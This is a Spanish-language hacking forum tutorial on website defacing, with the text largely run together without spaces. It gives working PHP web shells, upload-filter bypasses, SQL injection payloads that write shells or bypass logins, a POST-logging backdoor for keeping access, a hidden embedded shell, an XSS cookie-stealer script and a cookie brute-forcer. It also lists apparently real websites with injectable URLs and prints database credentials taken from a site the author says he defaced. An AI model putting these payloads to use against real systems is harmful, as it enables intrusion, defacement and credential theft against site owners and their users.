Sei sulla pagina 1di 16

29/7/2016

GrantutorialdeDefacing

GrantutorialdeDefacing
en:Septiembre16,2011,10:27:41pm

Holaamigos
Hoyostraigountutorialquehesacadodeunaredsocialdehacking,anunciadaenelforo.
Acontinuacineltutorial
Osvaisacansardeleer

Textos
*1.Tipsalahoradeusarshells+otrascuantascosas
*2.DeartificiosyotroscuentosenSqlinyeccion
*3.AtacandosistemasinformacionwebsbasadosenCookies
*4.PatrondeBugs
*5.CookieStealingenSMF1.1.7
*6.Recopilaciondetoolsdefacing(estoeslounicoqnoes100%mio)

Videos
*Aquiunvideobypasseandounuploaderyentrandoporsqlinyeccion.
ademasdejamosunuploaderembebidohttp://www.megaupload.com/?d=8HX4TMDN
*Subiendoshellasmf1.11,aplicapara2.0oelquesea.Todonetamenteprobadoenlab
http://www.megaupload.com/?d=TB5HN70F

Tipsalahoradeusarshells+otrascuantascosas
0x01Qsonlashells.
0x02PhpShells
0x03CreaciondePhpShells
0x04Subirunashellaunservidor
0x05Yasubilashellyahora?
0x06Preparandoelsistemaparavolver(Keyloggerphp)o(POSTloggerphp)
0x07Dejarshellincrustada(ShellEmbedded)
0x08Preguntasenotrosforossobreestetuto
0x09Conclusion
0x10Agradecimiento

0x01Shell
Aunashellcomotallapodemosdefinircomoelsoftwarequepermitequeelusuarioaccedaalosserviciosdel
sistemasinirdirectamentealkernel,sinoprecisamenteatravezdelashell,enotraspalabraslashellserauna
intermediariaentreelusuarioyelsistema.

0x02PhpShell(WebShell)

BuenoenesteordendeideaspodemosentoncesdecirqueunaphpShellesunintermediarioentreelsistemay
elusuario,conlaparticularidadqueestadesarrolladaenphp,asicomohayshellshechasenphp,tambien
existenenunsinfindelenguajesdeprogramacion,laventajadeqlashellestehechaenphpoenalgun
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/

1/16

29/7/2016

GrantutorialdeDefacing

lenguajedeprogramacionparalaweb,esqpodremosusarlashellaprovechandolosserviciosdelamaquina
remota.
enotraspalabrasGraciasaqueenlamaquinaremotaestacorriendounservicio,nuestra(Web)shellse
ejecutaraypodremosvisualizarlaporelnavegador.

0x03CreaciondeunaPhpShell.

Puescomoseimaginaransiquicieramoscrearunaphpshell,loquenecesitariamosfundamentalmentees
conocerafondoellenguajedeprogramacionenelquelavamosadesarrollar,ycrearopcionesdemanejode
archivos,navegacionenelservidoretc,esdecir,todoloquenosfaciliteinteractuarconelsistemaremoto.

unminiejemplodeunashell,quepuedaejecutarcomandosenelservidorseria.
partiendodequeelcomandodephp:system(`dir`)ejecutaelcomandodirenlamaquinadondeestealojado
elarchivo,entoncespodremosdecirqueloharemosparaqueejecutetodoloqueenvienporunnavegador.

comoasi?sipuesporejemplosihacemosunarchivophpconelsiguientecontenido:

Cdigo:[Seleccionar]
php
echo $_GET[`comando`];

loguardamoscomotest.php.locolocamosenunservidorwebquesoportephp(podrianhacerloenunofreeo
localmenteparaprobar)yaccedemmosalarchivoporelnavegadorasi

www.dondeestemontado.com/test.php?comando=Hola

elresultadoquenosdebearrojarelservidoressimpemente:Hola
puesloqueledecimosesqconGEToseahacereferenciaaloqviajeporlaurl(pordecirlodealgunmodo)y
solodecimosqueescribaloqllegoencomando.

simodificamoseltest.phpporalgocomoesto
Cdigo:[Seleccionar]
php
system( $_GET[`comando`]);

loqueharaseraejecutarelcomandoqleenviemosporlaurl
porejemplosimandamosalgocomoestoenlaurl
www.dondeestemontado.com/test.php?comando=dir

seejecutaraundirenelservidor.
tambienpodriamoshaceralgoasi:
Cdigo:[Seleccionar]

https://foro.hackxcrack.net/defacing/grantutorialdedefacing/

2/16

29/7/2016

GrantutorialdeDefacing

php
show_code( $_GET[`comando`]);
Cdigo:[Seleccionar]

www.dondeestemontado.com/test.php?comando=index.php

conloquevisualizaremoselcodigodeindex.php.
comoven,conestearchivophpestamosdeciertaformacomunicandosconlamaquina.asiquedigamosqeste
eselprincipiobasicodeunashell.Actualementeencontrarasshellsfamosascomoc99,c100,r57...entre
muchasotras,queyacuentanconsistemascompletoparasaltarsemuchosfiltros.sonfacilesdeencontrar.
simpementesiquierenalgunasdelasqlesdigocoloquenengoogle:
inurl:c99.txt

0x04Subirunashellaunservidor
Cuandosetratadeatacarunservidorweb,loqueunoprincipalmentebuscadeciertaforma,estratardecolar
unaphpshell,paraque?puesparatenermasaccesoalservidoreirporlainformacionquenosinteresa.
oseaqueyaseimaginaranquenecesitanunespeciedeuploadingoexplotaralguntipodebugquepermita
subirarchivos.partiendodeeseprincipiobasicoseimaginaranquesicolocamosdigamosengoogle
inurl:upload.php

encontraremosmuchosuploadingparaprobarhabersipodemoscolarunaphpshell.
meheencontradoconmuchaswebsquenofiltranlasextensionescorrectamenteloquenospermitesubir
archivosdeformaarbitraria,esoesalollamamosArbitraryfileUpload,esasicomopodemossubirunashell,
sintantodesmadre,yconpocoesfuerzo.
aprovechoparacontarlealgoqmesucedio,duranteeldefaceaelinformador...noteeunprincipioqteniablind
sqlinyeccion.puescomoalgunossabranesetipodeinyeccionsonalgotediosas...tardamosmuchoendar
conelresultadoquequeremosyavecesteniendoencuentaqprobablementenocorramosconsuerte.
entoncespsestabatrantandodehacerlacuandomedioporprobarencontrarelpaneldeadmindelawebque
estaubicadoen:
http://www.elinformador.com/admin/
metopeconunasorpresacuandoviquehabiaunuploaderparaimagenes,asiqueprobesubirunashell.
ypuesmedioresultado...mesorprendiunpocoeinclusivemedioalgoderisa,puesdeblindsqlinyecciona
tenerunuploadinglisto...ysinningunesfuerzopuesjum...nosahorramosbastante.
deestaformasubilashelldelinformador(queaunestaonline).
porotrolado,hayalgunostiposdefiltrosqnospodemossaltar,porejemploavecesusancosascomo
Cdigo:[Seleccionar]
php
if(strpos($HTTP_POST_FILES[`file`][`type`],"jpg"))

aquiloquehacenesmirarloqvieneenelcampotypedelacabecerahttp,paraobtenereltipodelarchivo,si
strposencuentraeltipodevuelvelaposicion,sinodevuelveunfalso...comotodossabranpodemosmodificar
lascabecerasparacambiareltipo,puedenusarelhttpliveheader,achilles,tamperdata...porotrolado
podemosencontrarnosconestafiltracion.

https://foro.hackxcrack.net/defacing/grantutorialdedefacing/

3/16

29/7/2016

GrantutorialdeDefacing

Cdigo:[Seleccionar]
php
$tipo=explode(".",$nombreFIle);
if($tipo[1]==`jpg`){
echo "paso";
}

conloquesolobastariasubirlashellconunnombrecomoesteshell.jpg.php,porq?porq
explode(`.`,`shell.jpg.php`)
parteelnombreenunvectorytomael.comoreferencia,portantolaposicion1tienejpgyla2tienephp.yal
compararsoloconla1entoncesalparecerseriaunjpg.

habercomoquemonosenestecontexto,notenemosningunuploading,solotenemosunsqlinyeccion,yno
tenemosadminloginninada.cuantoestopasa,podemosintentarfiltrarunashellconlasetenciaoutfile
podriaseralgocomo:
Cdigo:[Seleccionar]
union+select+,1,2,` system($_GET[cmd]); `+into+oufile+ruta/shell.php

sinosponemuchajoda..podemosintentarpasarelcodephpahexparafiltrarla.
TambienpodemossubirunarchivoconPUT,bajolacondicionqueelphpiniesteconesto
Cdigo:[Seleccionar]
allow_url_include = On
allow_url_fopen = On

teniendoelputactivadopodemosenviarenlacabecerahttpalgocomo
Cdigo:[Seleccionar]

PUT /archivo.php HTTP/1.1


Host: Ficticio.com
Content-Type: text/plain
Content-Length:4
Cdigo:[Seleccionar]
php
aqui code de la shell

ypodremossubirshell.

0x05Yasubilashellyahora?
Unavezquelogremostenerlashellarriba,unodelostipsocosasquepodemoshaceresbuscarlosarchivos
deconfiguraciondelaBD,paraque?puesparausmear,oparadumpearla,comoasidumpearla?puesveranes
simplementedescargarnosunacopiadesuBD,enparticularlasshellstienenopcionesparalosarchivosq
lista...comoverdescargareditaretc.
ejemplo

https://foro.hackxcrack.net/defacing/grantutorialdedefacing/

4/16

29/7/2016

GrantutorialdeDefacing

ahorausmeandounpocoencontramoslosarchivosdeconfiguracion,inclusivenotamosquenuestrashellnos
loindica.

https://foro.hackxcrack.net/defacing/grantutorialdedefacing/

5/16

29/7/2016

GrantutorialdeDefacing

siloclickeamosnosdarainformacioncomoesta:
Cdigo:[Seleccionar]
$user_db = `i1n1f3o4_admin`; // Server Username
$pass_db = `infor2005`; // Server Password
$host_db = `localhost`; // Server (e.g. localhost)

$db = `i1n1f3o4_encuesta`; // Database to be created or name of existing database (Please note: Database containing dashes cann

conloquenospodemosautenticaraqui.

Buenounavezcoloquemoslosdatos...dehost,Bduserypassword,podremosvisualizaralgocomo:

https://foro.hackxcrack.net/defacing/grantutorialdedefacing/

6/16

29/7/2016

GrantutorialdeDefacing

laopciondumpeslaqueleshabiamencionadopreviamente,ypuespodrannavegarenlabd...hagande
cuentaqueesunclientemysql.
lashelltieneopcionesparahacerbackconection.
paraquesirve?puesparabypasearelcortafuegos,podemosleerarchivosyaseausandophpomysql...
podremoshacerunsinfindecosas,yoaconsejoquelebrujeenalashellojalalalamontenlocalmente,y
ensayanlasopciones.quepuessonbastanteintuitivas.
0x06Preparandoelsistemaparavolver
Buenopueslaideaesqueunavezentramos,dejemosaseguradounproximoregreso,porelloestaesunade
lastantasopciones,setratadeguardarenunlog(quepodriaserremotoperoqueaquilodejodeformalocal),
estosepuedeubicarenelarchivophpencargadoderecibirlosdatosdellogin
Cdigo:[Seleccionar]
php
foreach($_POST as $index => $valor){
$log="[in]".$log.$index." = > ".$valor."[in]
";
}
$logFile= fopen(`logs.txt`, `a`);
fwrite($logFile, $log."n");

Ahorapodremosverloqueguardeellogenlogs.txt,aclaroqesunejemplosimple,sepodrianhacercosas
comoconexionporftp...etc.ysieladminquieredarsecuentaqueledejamosunkeylogger(seriamasun
POSTloggeroalgoasi),puestendriaqueirarevisarelcodigofuentedesuaplicacion.
0x07Dejarshellincrustada(ShellEmbedded)
setratadeagregarlashelldentrodeunarchivoexistente,conelfindeevitarsumararchivosalservidor,soloes
cuestiondeencontrarelarchivoindicado,yacomodamoslaminishellparaquesoloreaccionesienviamosun
parametroasi
Cdigo:[Seleccionar]
php
if($_GET[`activeshell`]==`activar`){
system( $_GET[`comando`]);
}

estoconelfindeevitarqsalganerrores...qadviertanquehayproblemasenelarchivo
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/

7/16

29/7/2016

GrantutorialdeDefacing

yloejecutariamosasi
www.dondeestemontado.com/test.php?comando=dir&activeshell=activar

Buenoaquiacabaestelistadodetips...ydeteoria...esperelesguste.

0x10Conclusiones

Nadasolorestadecir,siquieresatacaralgolamejorherramientaessabercomofunciona,asitendrasmas
posibilidades

2.DeartificiosyotroscuentosenSqlinyeccionby_4nd33xd_

0x01SqlInyeccion

Primeroquenada,puesconoceraqueseledenominainyeccion:esaquelcodigomaliciosoqueesmezclado
conunasetenciasqlnormal,conelfindealterarlaintencionnormaldelasetenciasql,ylograrunefecto
diferente.dichoefectopuessimplementeconsultaralgundatoespecial,oinsertaralgundatoespecial,inyectar
unarchivoetc.
0x02Introduccion
Paraestearticulovoyasuponerquequienloleatieneunconceptobasicodeloqueesinyeccionsql,yqueal
menossabeinyectarenunasituacionnormal.Buenolaideaescontaralgunaexperienciascreandoinyecciones
sql,endiferentescontextos,yanalizandodichassituacionesparaverificaralgunasposiblesvariantes.

Ciertodia,necesitabaentraraunsitioweb,yaqueeneseservidorseencontrabaunawebobjetivo,no
necesariamenteparadefacear,simplementeobjetivo.Buenopueshaciendounreversediconunawebquetenia
eltipicosqlinyeccion,construilainyeccion
resultoseralgocomo:
Cdigo:[Seleccionar]
+union+select+1,user,password,4,5,6,7,8,9,10+from+usuario+limit+5,1

buenoymetirouneluseryelhashasi
Cdigo:[Seleccionar]
edwinc:13dd3a9725dba7a9

hastaahi,todonormal,lomaloeraquenoteniauncrackeadornieldicamanoparacrackearesetipodehash,
asiquefuialpaneldeladministrador
ensayeunusuarioslkdjfljdsf,yelresultadofuedeciaqueelusuarionoexistia.
biendespuesmetielusuarioedwinc,ymedeciaqueelpassnoeraelcorrecto,porlocual,eramuyprobable
quelaconsultadellogueoestubieraensentenciassqldiferentes,intentesinanalizareltipico`or1=1,pero
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/

8/16

29/7/2016

GrantutorialdeDefacing

nofunciono,sinembargomearrojoalgunoserroresdesql.
entrelascosasquevienelerror,seveiaquelaconsultaqueintentabanhacerinternamenteera:
Cdigo:[Seleccionar]
select password(`passdigitado`) as cryptado

oseaqueposteriormentemesupusequeelparametrocrytadoestaconsultado,ycomparadoposiblementecon
loarrojadoenlaprimeraconsultaquesoloverificabaelusuarios.Comoasi?puesbienmetiuna`enellogin
paraquemearrojaraelerrordelaprimeraconsultayefectivamentehacianalgocomo

Cdigo:[Seleccionar]
select * from usuarios where user =`usuariodigitado`

conloquemihipotesis,sevolviomasprobable
asiquesimplementeloquedebiahacereracolocarenelparametrocrytadoelvalordelhashdelusuarioque
puseenellogueo:asiqueelbypassmevinoquedandoasi
login:
Cdigo:[Seleccionar]
edwinc

password:
Cdigo:[Seleccionar]
aku`),`13dd3a9725dba7a9` as cryptado /*

tambienesimportanteaclararelconocercualcomentarioeselqrealmentefuncionaparaelbypass,paramies
partefundamental,loqueyoregularmentehagoparadarmecuentadeestoes,primerometerun`para
verificarquetireerror,despuesprobar``paraprobarqpodemoscerrarcomillas,ydespuesprobar

Cdigo:[Seleccionar]
/* `
-- `
# `

sabremosqnossirve,porqnotiraraelerrorqsaliocuandocolocamos`deestamanerasabremoscual
comentariodebemostenerencuentaparabypassear.

yhappyhacking

....

Talvezestaidea.puedaaplicarseatiposdeautenticacionqueusan2setenciassqlparaellogueo,yquetiene
sqlinyeccion,yademasdamosconunpasspococomun.Aunqueenestecasosetratosobreuncotextomuy
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/

9/16

29/7/2016

GrantutorialdeDefacing

especifico,talvezexistansimulitudesenotrasaplicaciones.

0x03Elpeligrodeusarinadecuadamentelike
Buenopuesestosucedioconunaaplicacionweb,jsf+oraclesetrabaqueduranteellogueoseconsultaba
usandolafuncionlike,comomuchossabranlikeesusadoparabusquedasdepalabras,peronopara
comparacionesexactas,conlocualsabemosqueenviandoun%seharalaconsultadeformageneral,
basicamenteesuncomodin,porlocualsiunaaplicacionrealizaautenticacionesdetipo:

Cdigo:[Seleccionar]
php
$query="select * from usuarios where login like(`".$_POST[`login`]."`) and password like(`".$_GET[`password`].`"");

//silaconsultavienellenapasa

podremosbypassearlasimplementeenviando%tantoenellogincomoenelpassword,osinecesitadeun
usuariovalidoseriacuestiondetenerelusuariovalidoymandardepassword%.
porotrolado,sinecesitamosconocerlosdatosdeautenticacioncorreectos,yellogueonotieneencuentael
numerodeintentos,podemosrealizarbusqdasgeneralizadasparadarconlosdatos
preguntamosasi:
hayunloginqcontengalaletraa?
Cdigo:[Seleccionar]
login: %a%
password:%

sisi,pasa,sino,nologuea
hayunloginqcontengaac?
Cdigo:[Seleccionar]
login: %ac%
password:%

hayunloginqcontengalaletraad?

Cdigo:[Seleccionar]
login: %ad%
password:%

yasi...sepodriacodearunaexploitparaqueaprovecheesebugyencuentrelosdatoscorrectos,dadoelcaso
dequenecesitemoslosdatoscorrectosparaprobarquizasenelftpoenelemail.
3.AtacandosistemasinformacionwebsbasadosenCookiesby_4nd33xD_

0x01Introduccion
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/

10/16

29/7/2016

GrantutorialdeDefacing

0x02Quesonlascookies
0x03Arquetectura
0x03Tecnicaspararobodecookies
0x04InyecciondeCookie(crossdomaincookiespoofing)
0x05BruetandoCookiesconpocoscomponentes
0x06CookieHandling
0x07Conclusione
0x08Agradecimientos

0x01Introduccion
Lamayoriadelossistemasdeinformacionanivelweb,actuales,utilizanmetodosdeautenticacionbasadosen
sistemasdecookies,sinembargoavecesnonosdetemosapensarqueunamalagestiondecookiespuedeser
motivoparaexponerlainformaciondenuestrosistemas.Inclusivepodriadecirquemuchoswebsitebasansu
sistemaseseguridadencookies.
Buenoantesquenadalaideadeltutorialesplantearalgunosmetodosdeatacarsistemasdeinformacionque
basensuseguridadencookies.Asiqueempecemosconsaberqueesunacookie.
0x02Quesonlascookies
Lascookiesesalafinalunconjuntodedatosquepermiteaunservidoridentificardeciertaformaunvisitante.
Einclusivedecidirapartirdeestainformacionquesetratadeunusuariodelsistema,lascookiesson
almacenadasennuestrodiscoduroenelcasodeunsistemawebelnavegadoradministralascookiesy
garantiza"Enteoriaciertasreglas",porejemplo,unnavegadordebegarantizarqueeldominioalque
pertenecenunascookieseselunicoquepuedemanipularlascomotal.buenodeestoyahablaremos...
debemostenerencuentaquelascookiestienenvariosparametrocomoloson:
[]Nombredelacookie
[]valordelacookie
[]fechadeexpiraciondelacookie
[]dominioalaquepertenece
[]pathdondeseencuentraactivalacookie

Yaquevamosamanipularcookies,personalmenteusooperaparaadministrarlascookiesmanualmente,o
simplementeporelnavegparacrearunacookiepuedencolocarenelnavegador
Cdigo:[Seleccionar]
javascript:document.cookie =`nombreCookie=valor expires=Thu, 30 Aug 2009 20:47:11 UTC; path=/`

0x03ArquItectura

Seteodecookies:

https://foro.hackxcrack.net/defacing/grantutorialdedefacing/

11/16

29/7/2016

GrantutorialdeDefacing

Estaeslaideaquedejoplanteada,queessobrelaquesebasaeltutorial.

0x04Tecnicaspararobodecookies
UnadelastecnicasmasconocidaparaelrobodecookiesesaprovecharunXSS,queconsisteeninyectar
codigojavascriptohtmlenelnavegadordelclienteatravezdelavulnerabilidaddeunaweb,yprobablemente
conelfindeobtenerlascookiesdelmismositiowebvulnerable.estavulnerabilidadconsisteenquenosefiltro
correctamente
Cdigo:[Seleccionar]
php
echo $_GET[`mensaje`];

enestecasonosefiltr?elparametromensaje.siquicieramosatacarunawebconestecodigo,podriacrearun
iframeenotroserverquenosguardelacookies

https://foro.hackxcrack.net/defacing/grantutorialdedefacing/

12/16

29/7/2016

GrantutorialdeDefacing

loquehaceeseiframees,cargarlawebvulnaprovechandoelxssqueviajaporgetparaqueenvielascookiesa
elserverAtackquevendriasiendodondetenemosnuestrocookieStealer.
elcookieStealerdelquehablosoloesunscriptqueguardaloquevengaporelmetodogetenunarchivo
aquidejoelcode...estasencillo...lohevistoenmuchosladosporesonosedequienesecodexD

Cdigo:[Seleccionar]
php
$cookie = $_GET[`datos`];
$handler = fopen(`datos.txt`, `a`);
fwrite($handler, $datos."
");

Buenoesetipoderobodecookiesfuncionacuandosetratadeunxssporget,enelcasodelosxssporpostes
algomascomplicado.digamospuesunsimplelinknopuedeenviarporestemetodo.Tampocopodemos
pensarenenviarellainformacionpostusandophpdesdeelserver,puesnohariamosnada...yaque
necesitamosesquenuestravictimaenvieesosdatosparalograrelresultado.podriamostratardehacerlocon
unform,enviandolosparametrosnecesarios,aunquesegunesoestariamoshablandoqueelusuariodeberia
presionarenunboton,paraellopodriamospensarenalgunmetodojavascriptquehagaunsubmitdel
formularioypodamosenviarlo.

Segunloquehastaahorahemoshablado,planteamosqueenteorianoesposiblequedesdeundominioxse
inyectecodigoparaextraercookesdeundominioy,salvoelcasoqueelnavegadorseavulnerableaestetipode
extracciondecookies.Enotraspalabrasloqueintentoplantearesquecomolaadministraciondecookiestiene
suladofuerteenlosnavegadores,dependemosdeestos.
0x05Inyeccionde(crossdomaincookiespoofing)

Estevulnerabilidadsepresentacuandounnavegadorpermitedesdeundominiodigamos
www.ilegalintrusion.netcrearunacookiecondominiodewww.er00t.org,deestaformapodemosinyectar
cookiesenelnavegadordelclienteconlafinalidaddecrearunregistrosidconocidoporelatacante,unavez
queelusuarioselogueeenelsistema,elatacantetendraunsidconocidoyademasautenticadoenelsistema,
conloquetendremosunasessiondeusuario.IE6contodoslosparchesesvulnerableaesteataque,yotros
navegadoresenversionesanteriores.

estuveleyendoporahiunpaper(yanorecuerdobiendequiencreoqdehkm),enelqueseplanteaque
podemosfalsificarundominio,oseasiendowww.ilegalintrusion.netpodemoshacernospasarporwww.e
r00t.orgusandoalgunatecnicayaseadeDNSSpoofing,otansencillocomodecirqueenmireddearealocal
pongodenombreamimaquinaqueantessellamabailegalintrusionEr00t,deestaformafiguroconese
nombreloqueenteorianospermitirainyectaruncookiecondominioer00t.
lapreguntaescomocreolacookie?puescomoyadijeanteriormentelapodemoscrearejecutandoese
javascript,olapodemoscreardirectamentedesdephpusandolafuncionsetcookie.
Cdigo:[Seleccionar]
setCookie(nombre,$valor,$date,$directorio,$dominio);

seestaformanosquedaunvector$_COOKIE

0x06BruetandoCookiesconpocoscomponentes
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/

13/16

29/7/2016

GrantutorialdeDefacing

Partiendodequetengamosunsistemaquebasesuseguridadencookies(comomuchos),yquelacookie
tengapocoscomponentes.unadelascosasquepodemosintentarhaceressimplementetratardeadivinarla
cookie,lointerensantedebrutearunacookie,esquecasitodoslossistemaspermitenensayarcuantocookie
senosdelagana,yqueconobtenerunacookieescomosidieramosconelusuarioyelpasswordaltiempo.es
decirunacookieesunareferenciaquetraeenlamayoriadelasocasioneslaalusionaunusuario.hecodeado
unatoolquenospermitebrutearcookies.
Cdigo:[Seleccionar]

php
define(NAMEFILE,"cookies.html");
echo "
######################################################################################
#Cookie Brute Force by _4nd33xD_ #
#Usage php cooker.php http://www.website.com/path/index.php cookieName dict.txt#
#Gretz M@ndrake Black Team White-Shadow,Safety Last Group #
######################################################################################
";
$host =$argv[1];
$cookieName=$argv[2];
$dict =$argv[3];
if(empty($host) || empty($mode) || empty($cookieName) || empty($dict)){
echo "verifique parametros";die();
}

Lascookielastomadeunarchivodetexto,estebruteforcenotienenadadelotromundo,lointeresanteserala
formaenquesecreeelarchivodecookies,puesesodependeradelanalisisqueleharemosaloscomponentes
quetenganqueverconlacreaciondecookies.
0x07CookieHandling
AvecesseintentaGuardarinformacionvitaldeunusuarioenlascookies,esteesunerror,puestoquelas
cookiepuedenseralteradasfacilmente,cuandoalteramosunacookieparamanipularelfuncionamientodel
sistema,esaloqueseleconocecomoCookieHandling,
porejemplosupongamosquetenemosestaautenticacion:
Cdigo:[Seleccionar]
php
if($_COOKIE[`admin`]=`true`){
echo "Usuario autenticado";
}else{
echo "Bienvenido visitante";
}

estetiposcriptestotalmentevulnerableaunamanipulaciondecookie,bastaconcambiarelvalordelacookie
denombreadminatrueparaqueelusuarioseaautenticado.
lescuentoqueenunaocasionmetopeunawebqueponiadecookieelloginyelpassword...puesyase
imaginaranquesignificaeso,porunladoaunquevalidenellogincontraunbruteforce,podemoshacerloporlas
cookiessinproblema,ademasdequeunrobodecookiesseriacatastroficopuestendriamosnetoelloginyel
password,yaesolesumamosquevalidabanesascookiescontralabasededatossinmirarloquevenian
algocomo
Cdigo:[Seleccionar]

https://foro.hackxcrack.net/defacing/grantutorialdedefacing/

14/16

29/7/2016

GrantutorialdeDefacing

php
$query="select * from usuario where $login=`$_COOKIE[login]` and password=`$_COOKIE[`password`]`";

aloquebastariaconfijarlacookiedenombrelogina1`or1=1
Cdigo:[Seleccionar]
select * from usuario where $login=1` or 1=1 --

yhappyhacking

0x08Conclusione
Puesprimerotenerencuentaqueundescuidodeelfiltradodecookiesnospuedetraermuchosdoloresde
cabeza,porotroladonotamosquelascookiesquetienenlainformacionnetasinninguntipodeencriptacion
sonfacilmentemanipulables.Tenerencuentaademasqueseriaidealnobasartodonuestrosistemade
seguridadencookies.Lacantidaddecomponenteenunacookieinfluyenenlacomplejidaddelamisma,loque
hariareducirlaprobalidaddeataques.
4.PatrondeBugs

Dequesetrata?

Saludosgentebuenoparaquienesseestaniniciandoeneldefacing,puesqueriaaportarlesestainformacion,he
encontradounpatrondebugsenalgunosdesarrollosanivelweb,comoasipatrondebugs?sipuesveranA
vecescuandoseencuentraunbugcualquiera,esbuenomirarlacasadedesarrolloqueimplementoelsistema,
porq?puesporqsicometioeseerrorunavez,esprobableqtenganeseerrorenmuchasdesusaplicaciones,
esaloqdenominopatrondeerroresodebugs,obuenonosesitengaotronombre,peropsesmasomenos
eso.
Patrones.

Mehedadocuentaqcasitodaslasaplicacioneswebde:
"PoweredbyForamen"Tienensqlinyeccion
Ejemplo:

http://www.analesdemedicina.com/cardiologia/noticia.php?noticia=82071+union+select+1,@@version

nosiempreesenelmismocomponenteperosivaporelmismolado.
Igualsucedecon
poweredbyMaiku
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/

15/16

29/7/2016

GrantutorialdeDefacing

http://www.otakunomichi.com/ver_articulos.php?
articulo=11+union+select+1,2,concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+170,1

poweredbyNaranjaAzul

http://www.ministeriostorrefuerte.org/eventos.php?codigo=15`
http://gt.unmejorempleo.com/ofertas.php?id=1862`

Poweredby:Peruwebmedia.com
http://www.ciclismoperu.com/ver_titular.php?codigo=101&id=1`
http://www.disarva.com/vercategoriaquickbau.php?idmarca=12&id=55`

Deestaultimasiqhaywebs.meencontrebastantes.

Sqlinyeccionen
dork:inurl:php?id="PoweredbyKrtera"

Buenosolosetratadeesto,=amedidaqencuentrepatrones,puessepodrianirpublicandoaquimismo.nose
qtallessuenelaidea,yadepuesmiramossisereportanoquehacemosconeso.

5.CookieStealingenSMFby_84kur10_
[/color]
Buenoparaestetutoesnecesarioqueconozcanlateoriabasicasobrelosxss,ysobrecookies.
definicion:http://es.wikipedia.org/wiki/Cross_Site_Scripting
XSS
XSS,delinglsCrosssitescriptingesuntipodeinseguridadinformticaoagujerodeseguridadbasadoen
laexplotacindevulnerabilidadesdelsistemadevalidacindeHTMLincrustado.
quepermitieraejecutarcdigode"scripting",comoVBScriptoJavaScript,enelcontextodeotrodominio.
Fuente:http://hackingsocial.socialgo.com/magazine/read/defacing_24.html

https://foro.hackxcrack.net/defacing/grantutorialdedefacing/

16/16

Potrebbero piacerti anche